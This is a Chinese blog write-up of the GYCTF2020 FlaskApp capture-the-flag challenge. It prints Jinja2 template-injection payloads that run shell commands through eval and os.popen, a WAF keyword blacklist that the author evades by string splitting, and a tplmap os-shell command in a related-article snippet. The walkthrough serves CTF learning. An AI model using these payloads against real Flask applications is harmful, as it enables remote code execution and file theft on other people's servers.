[GYCTF2020]FlaskApp

最新推荐文章于 2023-12-07 13:45:45 发布
最新推荐文章于 2023-12-07 13:45:45 发布
阅读量345 收藏 1
点赞数
文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51684648/article/details/123501732
版权

[GYCTF2020]FlaskApp

看到题目,发现是Flask,猜测是SSTI模板注入,先尝试一下:

现在加密栏输入{{7+7}},复制base64编码,然后在解密栏输入,得到:

image-20220228143659271

尝试构造payload:

{{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('cat /f*').read()")}}

发现有waf:

在解密栏随便输入一些内容,发现抱错会出现一些信息

image-20220228144051144

尝试构造payload,打开app.py

{{x.__init__.__globals__['__builtins__'].open('app.py').read()}}

得到app.py源码,查看waf:

def waf(str): 
    black_list = ["flag","os","system","popen","import","eval","chr","request","subprocess","commands","socket","hex","base64","*","?"] 
    for x in black_list : 
        if x in str.lower() : 
            return 1

根据waf构造payload:

{{x.__init__.__globals__['__builtins__']['ev'+'al']("__imp"+"ort__('o"+"s').po"+"pen('l"+"s /').read()")}}

发现:

image-20220228144429009

查看文件即可得到flag:

{{x.__init__.__globals__['__builtins__']['ev'+'al']("__imp"+"ort__('o"+"s').po"+"pen('ca"+"t /this_is_the_fl"+"ag.txt').read()")}}

ca"+“t /this_is_the_fl”+“ag.txt’).read()”)}}`

YI_an#
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP登录环节防止sql注入的方法浅析
10-25
主要介绍了PHP登录环节防止sql注入的方法,需要的朋友可以参考下
SSTI模板注入绕过(进阶篇)
热门推荐
羽的博客
12-11 1万+
文章目录语法变量过滤器总结获取内置方法 以chr为例字符串构造获取键值或下标获取属性 下面的内容均以jinja2为例,根据官方文档来探寻绕过方法 文档链接 默认大家都已经可以利用没有任何过滤的模板注入 语法 官方文档对于模板的语法介绍如下 {% ... %} for Statements {{ ... }} for Expressions to print to the template output {# ... #} for Comments not included in the templat
ssrfme(flask代码审计)
weixin_52780973的博客
10-31 597
简单的flask框架代码审计
ctf的flask模板注入config、current_app、url_for和get_flashed_messages(转自浩哥)
qq_45290991的博客
09-05 1228
题目 过程 1.使用tplmap,发现有ssti注入 ./tplmap.py --os-shell -u 'http://www.target.com/page?name=John' 2.题目源码: import flask import os app = flask.Flask...
[GYCTF2020]FlaskApp 1(SSTI,PIN)
weixin_45577185的博客
10-20 1190
f12发现了提示,但是我对PIN没有了解所以没反应过来 扫了一下网站,发现了一个网站打开 非预期解: 本题存在SSTI注入 加密 {{7+7}} e3s3Kzd9fQ== 解密 回显14 说明是SSTI python-Flask模版注入攻击SSTI(python沙盒逃逸) 查看根目录: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init_
BUUCTF-[GYCTF2020]FlaskApp flask爆破pin
最新发布
m0_64180167的博客
12-07 766
这道题不需要爆破也可以getshellssti都给你了但是学习记录一下pin的获取首先就是通过base加密后 当base64解密的时候 会造成ssfr这里过滤了 * 所以使用 {{7+7}} 实现然后我们开始看看源代码可以发现HINT 下存在pin所以是找pin这里我们开始在解密随便输入内容报错了 然后我们可以看源代码这里可以发现没啥内容 但是有waf首先通过读取读取一下/etc/passwd。
GYCTF2020 FlaskApp
汗的博客
09-04 1666
GYCTF2020 FlaskApp,老规矩,还是buu的平台 知识点 flask的SSTI ssti的绕过(拼接字符串,倒序切片,内置对象、函数) pin码的生成 信息收集 因为题目名flask,所以先不进行常规信息收集,而是观察功能点,寻找易发生ssti的功能 提示里貌似没有什么信息,考虑到功能异常抛出常见于解密环节,所以随便输段不能解密的 直接报错抛出debug信息,看来是开启了debug模式 参见该文章:Flask开启debug模式等于给黑客留了后门 而且读到了app.py的部分代码 大致的
Python-Wafid识别和指纹Web应用防火墙WAF产品
08-10
Wafid识别和指纹Web应用防火墙(WAF)产品
Python-WhatWaf检测并绕过Web应用程序防火墙和保护系统
08-10
WhatWaf通过检测Web应用程序上的防火墙并尝试检测指定目标上的防火墙的旁路(或两个)来工作。
ssti python 沙箱jinja2利用,PIN获取之[GYCTF2020]FlaskApp
qq_58970968的博客
08-20 390
对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件。对于docker机则读取/proc/self/cgroup,其中第一行的/docker/字符串后面的内容作为机器的id,首先判断是什么类型的ssti,再利用,这里通过报错抛出debug信息的内容判断:爆出的报错部分的代码里面的特殊函数;得到的Mac地址:print(int('去掉“:”后的地址',16))
web buuctf [GYCTF2020]FlaskApp
weixin_44214568的博客
04-12 4239
知识点:1.flask的debug模式漏洞 2.flask字符拼接漏洞 1.开题 2.提示flask了,那不得不试一试SSTI 在加密内输入{{7*7}} ,生成base64码e3s3Kjd9fcKg; 将e3s3Kjd9fcKg输入到解码框内,显示no no no说明存在防御 换一个输入{{7+7}},base64码为e3s3Kzd9fQ==,解码后,显示的是14 综上存在SSTI 3.看提示页面,没啥东西,在解密页面(因为解密存在SSTI)再随便输入些字母,...
BUUCTF:[GYCTF2020]FlaskApp
末初的CSDN博客
09-19 1192
BUUCTF:[GYCTF2020]FlaskApp Writeup

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值